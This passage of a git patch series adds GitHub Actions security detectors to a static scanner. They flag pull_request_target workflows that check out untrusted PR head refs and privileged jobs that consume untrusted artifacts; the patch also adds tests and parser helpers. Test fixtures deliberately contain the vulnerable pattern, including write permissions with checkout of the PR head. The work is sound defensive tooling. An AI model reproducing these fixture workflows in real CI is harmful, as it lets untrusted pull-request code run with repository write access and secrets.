From ebb3c68f4a0b477da85fe4f92fc211ad684f916e Mon Sep 17 00:00:00 2001 From: Jonathan Santilli <1774227+jonathansantilli@users.noreply.github.com> Date: Mon, 23 Mar 2026 13:46:57 +0000 Subject: [PATCH 1/6] feat(workflow): add wave-f foundations and pr-target checkout detector --- docs/workflow-audit-parity-checklist.md | 11 + .../workflow-pr-target-checkout-head.ts | 130 +++++++++ src/layer2-static/engine.ts | 12 + src/layer2-static/workflow/analysis.ts | 264 ++++++++++++++++++ src/layer2-static/workflow/parser.ts | 49 +++- src/layer2-static/workflow/types.ts | 6 + tests/layer2/workflow-analysis.test.ts | 153 ++++++++++ tests/layer2/workflow-parser.test.ts | 12 + .../workflow-pr-target-checkout-head.test.ts | 136 +++++++++ tests/layer2/workflow-wave-f-engine.test.ts | 64 +++++ .../workflow-audit-parity-contract.test.ts | 1 + 11 files changed, 827 insertions(+), 11 deletions(-) create mode 100644 src/layer2-static/detectors/workflow-pr-target-checkout-head.ts create mode 100644 src/layer2-static/workflow/analysis.ts create mode 100644 tests/layer2/workflow-analysis.test.ts create mode 100644 tests/layer2/workflow-pr-target-checkout-head.test.ts create mode 100644 tests/layer2/workflow-wave-f-engine.test.ts diff --git a/docs/workflow-audit-parity-checklist.md b/docs/workflow-audit-parity-checklist.md index 3716e06..4418f57 100644 --- a/docs/workflow-audit-parity-checklist.md +++ b/docs/workflow-audit-parity-checklist.md @@ -51,6 +51,17 @@ Use this checklist to track the workflow-audit detectors implemented in CodeGate - [x] `unredacted-secrets` - [x] `bot-conditions` +## Wave F (Planned) + +- [ ] `workflow-call-boundary` +- [ ] `workflow-artifact-trust-chain` +- [ ] `workflow-oidc-untrusted-context` +- [x] `workflow-pr-target-checkout-head` +- [ ] `workflow-dynamic-matrix-injection` +- [ ] `workflow-secret-exfiltration` +- [ ] `dependabot-auto-merge` +- [ ] `workflow-local-action-mutation` + ## Notes - Checked items are implemented in CodeGate. 
diff --git a/src/layer2-static/detectors/workflow-pr-target-checkout-head.ts b/src/layer2-static/detectors/workflow-pr-target-checkout-head.ts new file mode 100644 index 0000000..928a5cd --- /dev/null +++ b/src/layer2-static/detectors/workflow-pr-target-checkout-head.ts @@ -0,0 +1,130 @@ +import type { Finding } from "../../types/finding.js"; +import { buildFindingEvidence } from "../evidence.js"; +import { collectUntrustedReachableJobIds } from "../workflow/analysis.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowPrTargetCheckoutHeadInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function hasWritePermission(value: unknown): boolean { + if (typeof value === "string") { + return value.trim().toLowerCase() === "write-all"; + } + if (!value || typeof value !== "object" || Array.isArray(value)) { + return false; + } + + return Object.values(value as Record).some((permission) => { + if (typeof permission !== "string") { + return false; + } + return permission.trim().toLowerCase() === "write"; + }); +} + +function isCheckoutStep(uses: string | undefined): boolean { + if (!uses) { + return false; + } + return /^actions\/checkout(?:@.+)?$/iu.test(uses.trim()); +} + +function isRiskyCheckoutRef(ref: string | undefined): boolean { + if (!ref) { + return false; + } + const normalized = ref.toLowerCase(); + return ( + normalized.includes("github.event.pull_request.head.") || normalized.includes("github.head_ref") + ); +} + +function hasInheritedSecrets(secrets: unknown): boolean { + return typeof secrets === "string" && secrets.trim().toLowerCase() === "inherit"; +} + +export function detectWorkflowPrTargetCheckoutHead( + input: WorkflowPrTargetCheckoutHeadInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const hasPullRequestTarget = facts.triggers.some( 
+ (trigger) => trigger.trim().toLowerCase() === "pull_request_target", + ); + if (!hasPullRequestTarget) { + return []; + } + + const reachableJobIds = collectUntrustedReachableJobIds(facts); + if (reachableJobIds.size === 0) { + return []; + } + + const findings: Finding[] = []; + const workflowPrivileged = hasWritePermission(facts.workflowPermissions); + + facts.jobs.forEach((job, jobIndex) => { + if (!reachableJobIds.has(job.id)) { + return; + } + + const jobPrivileged = + workflowPrivileged || hasWritePermission(job.permissions) || hasInheritedSecrets(job.secrets); + + job.steps.forEach((step, stepIndex) => { + if (!isCheckoutStep(step.uses)) { + return; + } + if (!isRiskyCheckoutRef(step.with?.ref)) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [ + "pull_request_target", + "actions/checkout", + step.with?.ref ?? "github.event.pull_request.head", + ], + fallbackValue: "pull_request_target workflow checks out untrusted PR head ref", + }); + + findings.push({ + rule_id: "workflow-pr-target-checkout-head", + finding_id: `WORKFLOW_PR_TARGET_CHECKOUT_HEAD-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: jobPrivileged ? "CRITICAL" : "HIGH", + category: "CI_TRIGGER", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].with.ref` }, + description: + "pull_request_target job checks out pull request head ref, enabling untrusted code execution in privileged context", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-284", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Avoid checking out pull request head refs in pull_request_target workflows", + "Use pull_request for untrusted code validation and keep privileged operations isolated", + "Enforce least-privilege token scopes and avoid inherited secrets for untrusted paths", + ], + evidence: evidence?.evidence ?? 
null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/engine.ts b/src/layer2-static/engine.ts index 50f9ec5..3cf6455 100644 --- a/src/layer2-static/engine.ts +++ b/src/layer2-static/engine.ts @@ -41,6 +41,7 @@ import { detectDependabotExecution } from "./detectors/dependabot-execution.js"; import { detectWorkflowHardcodedContainerCredentials } from "./detectors/workflow-hardcoded-container-credentials.js"; import { detectWorkflowUnredactedSecrets } from "./detectors/workflow-unredacted-secrets.js"; import { detectWorkflowBotConditions } from "./detectors/workflow-bot-conditions.js"; +import { detectWorkflowPrTargetCheckoutHead } from "./detectors/workflow-pr-target-checkout-head.js"; import { filterRegisteredAudits, type RegisteredAudit } from "./audits/registry.js"; import type { AuditPersona, RuntimeMode } from "../config.js"; import { FINDING_CATEGORIES, type Finding } from "../types/finding.js"; @@ -647,6 +648,17 @@ function buildFileAudits(): Array> { }) : [], }, + { + id: "workflow-pr-target-checkout-head", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? 
detectWorkflowPrTargetCheckoutHead({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, { id: "hardcoded-container-credentials", run: ({ file, input }) => diff --git a/src/layer2-static/workflow/analysis.ts b/src/layer2-static/workflow/analysis.ts new file mode 100644 index 0000000..c9211ef --- /dev/null +++ b/src/layer2-static/workflow/analysis.ts @@ -0,0 +1,264 @@ +import type { WorkflowFacts } from "./types.js"; + +const UNTRUSTED_TRIGGER_SET = new Set([ + "pull_request", + "pull_request_target", + "workflow_run", + "issue_comment", + "pull_request_review_comment", + "discussion_comment", +]); + +const BOT_ONLY_CONDITION_PATTERNS = [ + /github\.actor\s*==\s*['"]dependabot\[bot\]['"]/iu, + /github\.actor\s*==\s*['"]github-actions\[bot\]['"]/iu, + /github\.event\.pull_request\.head\.repo\.fork\s*==\s*false/iu, +]; + +const UPLOAD_ARTIFACT_ACTIONS = new Set([ + "actions/upload-artifact", + "actions/upload-artifact/merge", +]); + +const DOWNLOAD_ARTIFACT_ACTIONS = new Set(["actions/download-artifact"]); + +export interface WorkflowArtifactTransferEdge { + artifactName: string; + producerJobId: string; + producerStepIndex: number; + consumerJobId: string; + consumerStepIndex: number; + consumerDownloadsAll: boolean; +} + +export interface WorkflowCallBoundaryContext { + hasWorkflowCall: boolean; + declaredInputKeys: string[]; + requiredInputKeys: string[]; + declaredSecretKeys: string[]; + requiredSecretKeys: string[]; + jobsWithInheritedSecrets: string[]; + jobsCallingReusableWorkflow: string[]; +} + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function normalizeUses(uses: string | undefined): string | null { + if (!uses) { + return null; + } + const trimmed = uses.trim().toLowerCase(); + if (trimmed.length === 0) { + return null; + } + const atIndex = trimmed.indexOf("@"); + if (atIndex === 
-1) { + return trimmed; + } + return trimmed.slice(0, atIndex); +} + +function isWorkflowTriggerUntrusted(trigger: string): boolean { + return UNTRUSTED_TRIGGER_SET.has(trigger.trim().toLowerCase()); +} + +function isUntrustedRestrictedCondition(condition: string | undefined): boolean { + if (!condition) { + return false; + } + return BOT_ONLY_CONDITION_PATTERNS.some((pattern) => pattern.test(condition)); +} + +function normalizeArtifactName(value: string | undefined): string | null { + if (!value) { + return null; + } + const normalized = value.trim(); + return normalized.length > 0 ? normalized : null; +} + +export function buildWorkflowNeedsGraph(facts: WorkflowFacts): Map { + return new Map(facts.jobs.map((job) => [job.id, [...job.needs]])); +} + +export function collectTransitiveDependencies( + facts: WorkflowFacts, + seedJobIds: Iterable, +): Set { + const graph = buildWorkflowNeedsGraph(facts); + const visited = new Set(); + const queue = [...seedJobIds]; + + while (queue.length > 0) { + const current = queue.shift(); + if (!current) { + continue; + } + const dependencies = graph.get(current) ?? []; + for (const dependency of dependencies) { + if (visited.has(dependency)) { + continue; + } + visited.add(dependency); + queue.push(dependency); + } + } + + return visited; +} + +export function collectTransitiveDependents( + facts: WorkflowFacts, + seedJobIds: Iterable, +): Set { + const reverseGraph = new Map(); + for (const job of facts.jobs) { + for (const dependency of job.needs) { + const dependents = reverseGraph.get(dependency) ?? []; + dependents.push(job.id); + reverseGraph.set(dependency, dependents); + } + } + + const visited = new Set(); + const queue = [...seedJobIds]; + while (queue.length > 0) { + const current = queue.shift(); + if (!current) { + continue; + } + const dependents = reverseGraph.get(current) ?? 
[]; + for (const dependent of dependents) { + if (visited.has(dependent)) { + continue; + } + visited.add(dependent); + queue.push(dependent); + } + } + return visited; +} + +export function collectArtifactTransferEdges(facts: WorkflowFacts): WorkflowArtifactTransferEdge[] { + const producersByArtifact = new Map>(); + + const edges: WorkflowArtifactTransferEdge[] = []; + const dedupe = new Set(); + + for (const job of facts.jobs) { + for (const [stepIndex, step] of job.steps.entries()) { + const normalizedUses = normalizeUses(step.uses); + if (!normalizedUses || !UPLOAD_ARTIFACT_ACTIONS.has(normalizedUses)) { + continue; + } + const artifactName = normalizeArtifactName(step.with?.name) ?? "__unnamed__"; + const producers = producersByArtifact.get(artifactName) ?? []; + producers.push({ jobId: job.id, stepIndex }); + producersByArtifact.set(artifactName, producers); + } + } + + for (const job of facts.jobs) { + for (const [stepIndex, step] of job.steps.entries()) { + const normalizedUses = normalizeUses(step.uses); + if (!normalizedUses || !DOWNLOAD_ARTIFACT_ACTIONS.has(normalizedUses)) { + continue; + } + + const requestedName = normalizeArtifactName(step.with?.name); + const consumerDownloadsAll = !requestedName; + const artifactNames = requestedName + ? [requestedName] + : Array.from(producersByArtifact.keys()); + + for (const artifactName of artifactNames) { + const producers = producersByArtifact.get(artifactName) ?? []; + for (const producer of producers) { + const key = [ + artifactName, + producer.jobId, + producer.stepIndex, + job.id, + stepIndex, + consumerDownloadsAll ? 
"all" : "named", + ].join("|"); + if (dedupe.has(key)) { + continue; + } + dedupe.add(key); + edges.push({ + artifactName, + producerJobId: producer.jobId, + producerStepIndex: producer.stepIndex, + consumerJobId: job.id, + consumerStepIndex: stepIndex, + consumerDownloadsAll, + }); + } + } + } + } + + return edges; +} + +export function collectUntrustedReachableJobIds(facts: WorkflowFacts): Set { + const hasUntrustedTrigger = facts.triggers.some((trigger) => isWorkflowTriggerUntrusted(trigger)); + if (!hasUntrustedTrigger) { + return new Set(); + } + + return new Set( + facts.jobs.filter((job) => !isUntrustedRestrictedCondition(job.if)).map((job) => job.id), + ); +} + +export function extractWorkflowCallBoundaryContext( + parsed: unknown, + facts: WorkflowFacts, +): WorkflowCallBoundaryContext { + const root = asRecord(parsed); + const onRecord = root ? asRecord(root.on) : null; + const workflowCall = onRecord ? asRecord(onRecord.workflow_call) : null; + + const inputsRecord = workflowCall ? asRecord(workflowCall.inputs) : null; + const declaredInputKeys = inputsRecord ? Object.keys(inputsRecord) : []; + const requiredInputKeys = inputsRecord + ? Object.entries(inputsRecord) + .filter(([, value]) => asRecord(value)?.required === true) + .map(([key]) => key) + : []; + + const secretsRecord = workflowCall ? asRecord(workflowCall.secrets) : null; + const declaredSecretKeys = secretsRecord ? Object.keys(secretsRecord) : []; + const requiredSecretKeys = secretsRecord + ? 
Object.entries(secretsRecord) + .filter(([, value]) => asRecord(value)?.required === true) + .map(([key]) => key) + : []; + + const jobsWithInheritedSecrets = facts.jobs + .filter( + (job) => typeof job.secrets === "string" && job.secrets.trim().toLowerCase() === "inherit", + ) + .map((job) => job.id); + + const jobsCallingReusableWorkflow = facts.jobs + .filter((job) => typeof job.uses === "string" && job.uses.trim().length > 0) + .map((job) => job.id); + + return { + hasWorkflowCall: workflowCall !== null, + declaredInputKeys, + requiredInputKeys, + declaredSecretKeys, + requiredSecretKeys, + jobsWithInheritedSecrets, + jobsCallingReusableWorkflow, + }; +} diff --git a/src/layer2-static/workflow/parser.ts b/src/layer2-static/workflow/parser.ts index 2ceb3d1..63a6b1f 100644 --- a/src/layer2-static/workflow/parser.ts +++ b/src/layer2-static/workflow/parser.ts @@ -11,6 +11,37 @@ function asString(value: unknown): string | undefined { return typeof value === "string" ? value : undefined; } +function toStringMap(value: unknown): Record | undefined { + const record = asRecord(value); + if (!record) { + return undefined; + } + + const entries: Record = {}; + for (const [key, entry] of Object.entries(record)) { + if (typeof entry === "string") { + entries[key] = entry; + } + } + + return Object.keys(entries).length > 0 ? entries : undefined; +} + +function extractNeeds(value: unknown): string[] { + if (typeof value === "string") { + const normalized = value.trim(); + return normalized.length > 0 ? 
[normalized] : []; + } + + if (!Array.isArray(value)) { + return []; + } + + return value.filter( + (entry): entry is string => typeof entry === "string" && entry.trim().length > 0, + ); +} + function normalizeWorkflowPath(value: string): string { return value.replaceAll("\\", "/"); } @@ -41,20 +72,11 @@ function extractStepFacts(step: unknown): WorkflowStepFacts | null { return null; } - const withValues = asRecord(stepRecord.with); - const withEntries: Record = {}; - if (withValues) { - for (const [key, value] of Object.entries(withValues)) { - if (typeof value === "string") { - withEntries[key] = value; - } - } - } - const stepFacts: WorkflowStepFacts = { + if: asString(stepRecord.if), uses: asString(stepRecord.uses), run: asString(stepRecord.run), - with: Object.keys(withEntries).length > 0 ? withEntries : undefined, + with: toStringMap(stepRecord.with), }; if (!stepFacts.uses && !stepFacts.run) { @@ -77,6 +99,11 @@ function extractJobFacts(id: string, value: unknown): WorkflowJobFacts | null { return { id, + if: asString(jobRecord.if), + uses: asString(jobRecord.uses), + with: toStringMap(jobRecord.with), + needs: extractNeeds(jobRecord.needs), + secrets: jobRecord.secrets, permissions: jobRecord.permissions, steps, }; diff --git a/src/layer2-static/workflow/types.ts b/src/layer2-static/workflow/types.ts index 4570621..cfc1ad2 100644 --- a/src/layer2-static/workflow/types.ts +++ b/src/layer2-static/workflow/types.ts @@ -1,4 +1,5 @@ export interface WorkflowStepFacts { + if?: string; uses?: string; run?: string; with?: Record; @@ -6,6 +7,11 @@ export interface WorkflowStepFacts { export interface WorkflowJobFacts { id: string; + if?: string; + uses?: string; + with?: Record; + needs: string[]; + secrets?: unknown; permissions?: unknown; steps: WorkflowStepFacts[]; } diff --git a/tests/layer2/workflow-analysis.test.ts b/tests/layer2/workflow-analysis.test.ts new file mode 100644 index 0000000..2d96681 --- /dev/null +++ b/tests/layer2/workflow-analysis.test.ts @@ 
-0,0 +1,153 @@ +import { describe, expect, it } from "vitest"; +import { extractWorkflowFacts } from "../../src/layer2-static/workflow/parser"; +import { + buildWorkflowNeedsGraph, + collectArtifactTransferEdges, + collectTransitiveDependencies, + collectTransitiveDependents, + collectUntrustedReachableJobIds, + extractWorkflowCallBoundaryContext, +} from "../../src/layer2-static/workflow/analysis"; + +describe("workflow analysis helpers", () => { + it("builds dependency graph and computes transitive closures", () => { + const facts = extractWorkflowFacts({ + on: ["push"], + jobs: { + build: {}, + test: { needs: "build" }, + package: { needs: ["test"] }, + deploy: { needs: ["package"] }, + }, + }); + + expect(facts).not.toBeNull(); + const graph = buildWorkflowNeedsGraph(facts!); + expect(graph.get("deploy")).toEqual(["package"]); + expect(graph.get("test")).toEqual(["build"]); + + expect(Array.from(collectTransitiveDependencies(facts!, ["deploy"])).sort()).toEqual([ + "build", + "package", + "test", + ]); + + expect(Array.from(collectTransitiveDependents(facts!, ["build"])).sort()).toEqual([ + "deploy", + "package", + "test", + ]); + }); + + it("links artifact producer and consumer jobs", () => { + const facts = extractWorkflowFacts({ + on: ["pull_request"], + jobs: { + build: { + steps: [ + { + uses: "actions/upload-artifact@v4", + with: { name: "dist" }, + }, + ], + }, + verify: { + needs: "build", + steps: [ + { + uses: "actions/download-artifact@v4", + with: { name: "dist" }, + }, + ], + }, + aggregate: { + steps: [ + { + uses: "actions/download-artifact@v4", + }, + ], + }, + }, + }); + + expect(facts).not.toBeNull(); + const edges = collectArtifactTransferEdges(facts!); + expect(edges).toEqual( + expect.arrayContaining([ + expect.objectContaining({ + artifactName: "dist", + producerJobId: "build", + consumerJobId: "verify", + }), + expect.objectContaining({ + artifactName: "dist", + producerJobId: "build", + consumerJobId: "aggregate", + consumerDownloadsAll: 
true, + }), + ]), + ); + }); + + it("identifies untrusted-trigger jobs while honoring restrictive bot-only conditions", () => { + const facts = extractWorkflowFacts({ + on: ["pull_request_target"], + jobs: { + open: {}, + bot_only: { + if: "github.actor == 'dependabot[bot]'", + }, + guarded: { + if: "github.event.pull_request.head.repo.fork == false", + }, + }, + }); + + expect(facts).not.toBeNull(); + expect(Array.from(collectUntrustedReachableJobIds(facts!)).sort()).toEqual(["open"]); + }); + + it("extracts workflow_call boundary context including inherited secrets and reusable workflow jobs", () => { + const parsed = { + on: { + workflow_call: { + inputs: { + config_path: { + required: true, + type: "string", + }, + }, + secrets: { + publish_token: { + required: true, + }, + }, + }, + }, + jobs: { + prepare: { + secrets: "inherit", + steps: [{ run: "echo prep" }], + }, + invoke_release: { + uses: "org/shared/.github/workflows/release.yml@v1", + with: { + publish: "true", + }, + }, + }, + }; + + const facts = extractWorkflowFacts(parsed); + expect(facts).not.toBeNull(); + + const boundary = extractWorkflowCallBoundaryContext(parsed, facts!); + expect(boundary.hasWorkflowCall).toBe(true); + expect(boundary.declaredInputKeys).toEqual(["config_path"]); + expect(boundary.requiredInputKeys).toEqual(["config_path"]); + expect(boundary.declaredSecretKeys).toEqual(["publish_token"]); + expect(boundary.requiredSecretKeys).toEqual(["publish_token"]); + expect(boundary.jobsWithInheritedSecrets).toEqual(["prepare"]); + expect(boundary.jobsCallingReusableWorkflow).toEqual(["invoke_release"]); + }); +}); diff --git a/tests/layer2/workflow-parser.test.ts b/tests/layer2/workflow-parser.test.ts index 559fef3..4319987 100644 --- a/tests/layer2/workflow-parser.test.ts +++ b/tests/layer2/workflow-parser.test.ts @@ -17,9 +17,16 @@ describe("workflow parser", () => { permissions: "write-all", jobs: { test: { + if: "github.actor == 'dependabot[bot]'", + needs: "prepare", permissions: { 
contents: "write", }, + secrets: "inherit", + uses: "org/reusable/.github/workflows/test.yml@v1", + with: { + language: "node", + }, steps: [ { uses: "actions/checkout@v4", @@ -36,6 +43,11 @@ describe("workflow parser", () => { expect(facts?.triggers).toEqual(expect.arrayContaining(["pull_request", "workflow_dispatch"])); expect(facts?.workflowPermissions).toBe("write-all"); expect(facts?.jobs).toHaveLength(1); + expect(facts?.jobs[0]?.if).toContain("dependabot"); + expect(facts?.jobs[0]?.needs).toEqual(["prepare"]); + expect(facts?.jobs[0]?.uses).toBe("org/reusable/.github/workflows/test.yml@v1"); + expect(facts?.jobs[0]?.with?.language).toBe("node"); + expect(facts?.jobs[0]?.secrets).toBe("inherit"); expect(facts?.jobs[0]?.steps[0]?.uses).toBe("actions/checkout@v4"); expect(facts?.jobs[0]?.steps[1]?.run).toContain("${{"); }); diff --git a/tests/layer2/workflow-pr-target-checkout-head.test.ts b/tests/layer2/workflow-pr-target-checkout-head.test.ts new file mode 100644 index 0000000..72bab09 --- /dev/null +++ b/tests/layer2/workflow-pr-target-checkout-head.test.ts @@ -0,0 +1,136 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowPrTargetCheckoutHead } from "../../src/layer2-static/detectors/workflow-pr-target-checkout-head"; + +describe("workflow pr-target checkout head detector", () => { + it("flags pull_request_target workflows that checkout PR head with write permissions", () => { + const findings = detectWorkflowPrTargetCheckoutHead({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request_target] +jobs: + release: + permissions: + contents: write + steps: + - uses: actions/checkout@v4 + with: + ref: \${{ github.event.pull_request.head.sha }} +`, + parsed: { + on: ["pull_request_target"], + jobs: { + release: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "actions/checkout@v4", + with: { + ref: "${{ github.event.pull_request.head.sha }}", + }, + }, + ], + }, + }, + }, + }); + + 
expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-pr-target-checkout-head"); + expect(findings[0]?.severity).toBe("CRITICAL"); + }); + + it("flags pull_request_target checkout of PR head even without explicit write permissions", () => { + const findings = detectWorkflowPrTargetCheckoutHead({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request_target] +jobs: + verify: + steps: + - uses: actions/checkout@v4 + with: + ref: \${{ github.event.pull_request.head.ref }} +`, + parsed: { + on: ["pull_request_target"], + jobs: { + verify: { + steps: [ + { + uses: "actions/checkout@v4", + with: { + ref: "${{ github.event.pull_request.head.ref }}", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.severity).toBe("HIGH"); + }); + + it("does not flag pull_request workflows", () => { + const findings = detectWorkflowPrTargetCheckoutHead({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request] +jobs: + release: + permissions: + contents: write + steps: + - uses: actions/checkout@v4 + with: + ref: \${{ github.event.pull_request.head.sha }} +`, + parsed: { + on: ["pull_request"], + jobs: { + release: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "actions/checkout@v4", + with: { + ref: "${{ github.event.pull_request.head.sha }}", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); + + it("does not flag pull_request_target workflows without risky checkout ref", () => { + const findings = detectWorkflowPrTargetCheckoutHead({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request_target] +jobs: + release: + steps: + - uses: actions/checkout@v4 +`, + parsed: { + on: ["pull_request_target"], + jobs: { + release: { + steps: [ + { + uses: "actions/checkout@v4", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git 
a/tests/layer2/workflow-wave-f-engine.test.ts b/tests/layer2/workflow-wave-f-engine.test.ts new file mode 100644 index 0000000..df58253 --- /dev/null +++ b/tests/layer2/workflow-wave-f-engine.test.ts @@ -0,0 +1,64 @@ +import { describe, expect, it } from "vitest"; +import { runStaticEngine, type StaticEngineConfig } from "../../src/layer2-static/engine"; + +const BASE_CONFIG: StaticEngineConfig = { + knownSafeMcpServers: [], + knownSafeFormatters: [], + knownSafeLspServers: [], + knownSafeHooks: [], + blockedCommands: ["bash", "sh"], + trustedApiDomains: [], + unicodeAnalysis: true, + checkIdeSettings: true, + persona: "auditor", + runtimeMode: "offline", + workflowAuditsEnabled: true, +}; + +describe("workflow wave F engine integration", () => { + it("surfaces workflow-pr-target-checkout-head findings through runStaticEngine", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/release.yml", + format: "yaml", + textContent: `on: [pull_request_target] +jobs: + release: + permissions: + contents: write + steps: + - uses: actions/checkout@v4 + with: + ref: \${{ github.event.pull_request.head.sha }} +`, + parsed: { + on: ["pull_request_target"], + jobs: { + release: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "actions/checkout@v4", + with: { + ref: "${{ github.event.pull_request.head.sha }}", + }, + }, + ], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + const ruleIds = new Set(findings.map((finding) => finding.rule_id)); + expect(ruleIds.has("workflow-pr-target-checkout-head")).toBe(true); + }); +}); diff --git a/tests/meta/workflow-audit-parity-contract.test.ts b/tests/meta/workflow-audit-parity-contract.test.ts index d8f2585..2ff2e43 100644 --- a/tests/meta/workflow-audit-parity-contract.test.ts +++ b/tests/meta/workflow-audit-parity-contract.test.ts @@ -40,6 +40,7 @@ const expectedCheckedAuditIds = [ 
"hardcoded-container-credentials", "unredacted-secrets", "bot-conditions", + "workflow-pr-target-checkout-head", ] as const; function readChecklist(): string { From 203bc431c0c0cfd17e6ef7d8620715b6b56c25f9 Mon Sep 17 00:00:00 2001 From: Jonathan Santilli <1774227+jonathansantilli@users.noreply.github.com> Date: Mon, 23 Mar 2026 13:51:24 +0000 Subject: [PATCH 2/6] feat(workflow): add artifact trust-chain and call-boundary audits --- docs/workflow-audit-parity-checklist.md | 3 +- .../workflow-artifact-trust-chain.ts | 120 ++++++++++++++++ .../detectors/workflow-call-boundary.ts | 112 +++++++++++++++ src/layer2-static/engine.ts | 24 ++++ .../workflow-artifact-trust-chain.test.ts | 117 +++++++++++++++ tests/layer2/workflow-call-boundary.test.ts | 133 ++++++++++++++++++ tests/layer2/workflow-wave-f-engine.test.ts | 102 ++++++++++++++ .../workflow-audit-parity-contract.test.ts | 2 + 8 files changed, 612 insertions(+), 1 deletion(-) create mode 100644 src/layer2-static/detectors/workflow-artifact-trust-chain.ts create mode 100644 src/layer2-static/detectors/workflow-call-boundary.ts create mode 100644 tests/layer2/workflow-artifact-trust-chain.test.ts create mode 100644 tests/layer2/workflow-call-boundary.test.ts diff --git a/docs/workflow-audit-parity-checklist.md b/docs/workflow-audit-parity-checklist.md index 4418f57..94d3d19 100644 --- a/docs/workflow-audit-parity-checklist.md +++ b/docs/workflow-audit-parity-checklist.md @@ -54,7 +54,8 @@ Use this checklist to track the workflow-audit detectors implemented in CodeGate ## Wave F (Planned) - [ ] `workflow-call-boundary` -- [ ] `workflow-artifact-trust-chain` +- [x] `workflow-call-boundary` +- [x] `workflow-artifact-trust-chain` - [ ] `workflow-oidc-untrusted-context` - [x] `workflow-pr-target-checkout-head` - [ ] `workflow-dynamic-matrix-injection` diff --git a/src/layer2-static/detectors/workflow-artifact-trust-chain.ts b/src/layer2-static/detectors/workflow-artifact-trust-chain.ts new file mode 100644 index 
0000000..edf42ae --- /dev/null +++ b/src/layer2-static/detectors/workflow-artifact-trust-chain.ts @@ -0,0 +1,120 @@ +import type { Finding } from "../../types/finding.js"; +import { buildFindingEvidence } from "../evidence.js"; +import { + collectArtifactTransferEdges, + collectUntrustedReachableJobIds, +} from "../workflow/analysis.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowArtifactTrustChainInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function hasWritePermission(value: unknown): boolean { + if (typeof value === "string") { + return value.trim().toLowerCase() === "write-all"; + } + if (!value || typeof value !== "object" || Array.isArray(value)) { + return false; + } + return Object.values(value as Record).some( + (permission) => typeof permission === "string" && permission.trim().toLowerCase() === "write", + ); +} + +function hasInheritedSecrets(secrets: unknown): boolean { + return typeof secrets === "string" && secrets.trim().toLowerCase() === "inherit"; +} + +function hasExecutableRunStep(jobSteps: Array<{ run?: string }>): boolean { + return jobSteps.some((step) => typeof step.run === "string" && step.run.trim().length > 0); +} + +export function detectWorkflowArtifactTrustChain( + input: WorkflowArtifactTrustChainInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const untrustedJobIds = collectUntrustedReachableJobIds(facts); + if (untrustedJobIds.size === 0) { + return []; + } + + const workflowHasWritePermissions = hasWritePermission(facts.workflowPermissions); + const jobsById = new Map(facts.jobs.map((job) => [job.id, job])); + const findings: Finding[] = []; + const dedupe = new Set(); + + for (const edge of collectArtifactTransferEdges(facts)) { + if (!untrustedJobIds.has(edge.producerJobId)) { + continue; + } + + const 
consumerJob = jobsById.get(edge.consumerJobId); + if (!consumerJob) { + continue; + } + + const consumerPrivileged = + workflowHasWritePermissions || + hasWritePermission(consumerJob.permissions) || + hasInheritedSecrets(consumerJob.secrets); + + if (!consumerPrivileged || !hasExecutableRunStep(consumerJob.steps)) { + continue; + } + + const dedupeKey = `${edge.producerJobId}|${edge.consumerJobId}|${edge.artifactName}`; + if (dedupe.has(dedupeKey)) { + continue; + } + dedupe.add(dedupeKey); + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [ + "actions/upload-artifact", + "actions/download-artifact", + edge.artifactName, + "pull_request", + ], + fallbackValue: `${edge.consumerJobId} consumes artifact ${edge.artifactName} from untrusted producer ${edge.producerJobId}`, + }); + + findings.push({ + rule_id: "workflow-artifact-trust-chain", + finding_id: `WORKFLOW_ARTIFACT_TRUST_CHAIN-${input.filePath}-${edge.producerJobId}-${edge.consumerJobId}-${edge.artifactName}`, + severity: edge.consumerDownloadsAll ? "CRITICAL" : "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${edge.consumerJobId}.steps[${edge.consumerStepIndex}]` }, + description: + "Privileged job executes after downloading artifacts produced in an untrusted workflow path", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Separate untrusted artifact production from privileged execution jobs", + "Require integrity verification before consuming downloaded artifacts", + "Avoid executing downloaded artifacts in jobs with write tokens or inherited secrets", + ], + evidence: evidence?.evidence ?? 
